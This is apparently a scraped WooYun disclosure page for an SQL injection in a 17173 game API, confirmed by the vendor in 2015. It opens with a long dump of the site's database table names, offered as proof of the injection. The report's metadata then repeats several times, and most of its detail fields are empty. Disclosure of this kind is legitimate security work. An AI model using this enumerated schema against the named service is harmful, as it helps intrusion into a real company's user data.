| result_1009433       |
| result_1009438       |
| result_1009439       |
| result_1009442       |
| result_1009453       |
| result_1009457       |
| result_1009458       |
| result_1009465       |
| result_1009473       |
| result_1009478       |
| result_1009480       |
| result_1009481       |
| result_1009482       |
| result_1009514       |
| result_1009515       |
| result_1009517       |
| result_1009518       |
| result_1009519       |
| result_1009520       |
| result_1009524       |
| result_1009525       |
| result_1009526       |
| result_1009527       |
| result_1009528       |
| result_1009529       |
| result_1009530       |
| result_1009531       |
| result_1009532       |
| result_1009533       |
| result_1009534       |
| result_1009538       |
| result_1009539       |
| result_1009543       |
| result_1009544       |
| result_1009545       |
| result_1009546       |
| result_1009547       |
| result_1009548       |
| result_1009549       |
| result_1009550       |
| result_1009551       |
| result_1009552       |
| result_1009556       |
| result_1009563       |
| result_1009564       |
| result_1009568       |
| result_1009572       |
| result_1009573       |
| result_1009580       |
| result_1009584       |
| result_1009587       |
| result_1009591       |
| result_1009592       |
| result_1009593       |
| result_1009600       |
| result_1009604       |
| result_1009605       |
| result_1009606       |
| result_1009607       |
| result_1009624       |
| result_1009633       |
| result_1009646       |
| result_1009647       |
| result_1009650       |
| result_1009651       |
| result_1009652       |
| result_1009653       |
| result_1009655       |
| result_1009656       |
| result_1009657       |
| result_1009658       |
| result_1009659       |
| result_1009660       |
| result_1009661       |
| result_1009662       |
| result_1009663       |
| result_1009665       |
| result_1009666       |
| result_1009667       |
| result_1009668       |
| result_1009669       |
| result_1009670       |
| result_1009671       |
| result_1009672       |
| result_1009673       |
| result_1009674       |
| result_1009675       |
| result_1009676       |
| result_1009677       |
| result_1009678       |
| result_1009682       |
| result_1009683       |
| result_1009685       |
| result_1009686       |
| result_1009687       |
| result_1009688       |
| result_1009689       |
| result_1009690       |
| result_1009691       |
| result_1009692       |
| result_1009693       |
| result_1009695       |
| result_1009696       |
| result_1009697       |
| result_1009698       |
| result_1009699       |
| result_1009700       |
| result_1009701       |
| result_1009702       |
| result_1009703       |
| result_1009704       |
| result_1009705       |
| result_1009706       |
| result_1009707       |
| result_1009708       |
| result_1009709       |
| result_1009710       |
| result_1009711       |
| result_1009712       |
| result_1009713       |
| result_1009714       |
| result_1009715       |
| result_1009716       |
| result_10274         |
| result_107           |
| result_109           |
| result_11249         |
| result_114           |
| result_115           |
| result_128           |
| result_132           |
| result_136           |
| result_138           |
| result_143           |
| result_145           |
| result_148           |
| result_150           |
| result_153           |
| result_154           |
| result_155           |
| result_156           |
| result_164           |
| result_166           |
| result_174           |
| result_179           |
| result_180           |
| result_184           |
| result_189           |
| result_190           |
| result_194           |
| result_198           |
| result_199           |
| result_20            |
| result_201           |
| result_206           |
| result_209           |
| result_212           |
| result_219           |
| result_220           |
| result_233           |
| result_239           |
| result_240           |
| result_241           |
| result_242           |
| result_246           |
| result_255           |
| result_259           |
| result_260           |
| result_262           |
| result_263           |
| result_267           |
| result_268           |
| result_270           |
| result_275           |
| result_278           |
| result_280           |
| result_292           |
| result_298           |
| result_308           |
| result_314           |
| result_321           |
| result_326           |
| result_328           |
| result_331           |
| result_333           |
| result_334           |
| result_34            |
| result_347           |
| result_350           |
| result_353           |
| result_354           |
| result_359           |
| result_366           |
| result_369           |
| result_380           |
| result_395           |
| result_399           |
| result_408           |
| result_414           |
| result_415           |
| result_42            |
| result_431           |
| result_433           |
| result_434           |
| result_438           |
| result_440           |
| result_441           |
| result_442           |
| result_460           |
| result_462           |
| result_466           |
| result_468           |
| result_47            |
| result_471           |
| result_474           |
| result_482           |
| result_488           |
| result_489           |
| result_493           |
| result_496           |
| result_498           |
| result_501           |
| result_505           |
| result_509           |
| result_51            |
| result_511           |
| result_512           |
| result_515           |
| result_516           |
| result_525           |
| result_528           |
| result_529           |
| result_531           |
| result_547           |
| result_55            |
| result_552           |
| result_555           |
| result_559           |
| result_563           |
| result_580           |
| result_581           |
| result_583           |
| result_59            |
| result_591           |
| result_594           |
| result_595           |
| result_599           |
| result_608           |
| result_614           |
| result_618           |
| result_619           |
| result_62            |
| result_626           |
| result_63            |
| result_64            |
| result_67            |
| result_70            |
| result_71            |
| result_86            |
| result_89            |
| result_97            |
| result_99            |
| result_info          |
| result_vote          |
| result_xxx           |
| solve_answerinfo     |
| subscribe_question   |
| toolbar_announcement |
| top_askinfo          |
| user_base            |
| user_base1           |
| user_ext_info        |
| user_game_info       |
| user_log             |
| user_score_info      |
| userask_0            |
| userask_1            |
| userask_2            |
| userask_3            |
| userask_4            |
| userask_5            |
| userask_6            |
| userask_7            |
| userask_8            |
| userask_9            |
| userask_a            |
| userask_b            |
| userask_c            |
| userask_d            |
| userask_e            |
| userask_f            |
| userask_g            |
| userask_h            |
| userask_i            |
| userask_j            |
| userask_k            |
| userask_l            |
| userask_m            |
| userask_n            |
| userask_o            |
| userask_p            |
| userask_q            |
| userask_r            |
| userask_s            |
| userask_t            |
| userask_u            |
| userask_v            |
| userask_w            |
| userask_x            |
| userask_xxx          |
| userask_y            |
| userask_z            |
| usernotice           |
| userresult_0         |
| userresult_1         |
| userresult_2         |
| userresult_3         |
| userresult_4         |
| userresult_5         |
| userresult_6         |
| userresult_7         |
| userresult_8         |
| userresult_9         |
| userresult_a         |
| userresult_b         |
| userresult_c         |
| userresult_d         |
| userresult_e         |
| userresult_f         |
| userresult_g         |
| userresult_h         |
| userresult_i         |
| userresult_j         |
| userresult_k         |
| userresult_l         |
| userresult_m         |
| userresult_n         |
| userresult_o         |
| userresult_p         |
| userresult_q         |
| userresult_r         |
| userresult_s         |
| userresult_t         |
| userresult_u         |
| userresult_v         |
| userresult_w         |
| userresult_x         |
| userresult_xxx       |
| userresult_y         |
| userresult_z         |
| uservote_0           |
| uservote_1           |
| uservote_2           |
| uservote_3           |
| uservote_4           |
| uservote_5           |
| uservote_6           |
| uservote_7           |
| uservote_8           |
| uservote_9           |
| uservote_a           |
| uservote_b           |
| uservote_c           |
| uservote_d           |
| uservote_e           |
| uservote_f           |
| uservote_g           |
| uservote_h           |
| uservote_i           |
| uservote_j           |
| uservote_k           |
| uservote_l           |
| uservote_m           |
| uservote_n           |
| uservote_o           |
| uservote_p           |
| uservote_q           |
| uservote_r           |
| uservote_s           |
| uservote_t           |
| uservote_u           |
| uservote_v           |
| uservote_w           |
| uservote_x           |
| uservote_xxx         |
| uservote_y           |
| uservote_z           |
| vote                 |
| vote_info            |
+----------------------+

漏洞证明：

如上

修复方案：

你们懂得比我多！~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-09-21 14:24

厂商回复：

非常感谢！！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142436

漏洞标题：17173游戏某API接口存在SQL注入

相关厂商：17173游戏

漏洞作者：路人甲

提交时间：2015-09-21 12:23

修复时间：2015-11-05 14:26

公开时间：2015-11-05 14:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142436

漏洞标题：17173游戏某API接口存在SQL注入

相关厂商：17173游戏

漏洞作者： 路人甲

提交时间：2015-09-21 12:23

修复时间：2015-11-05 14:26

公开时间：2015-11-05 14:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0142436"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云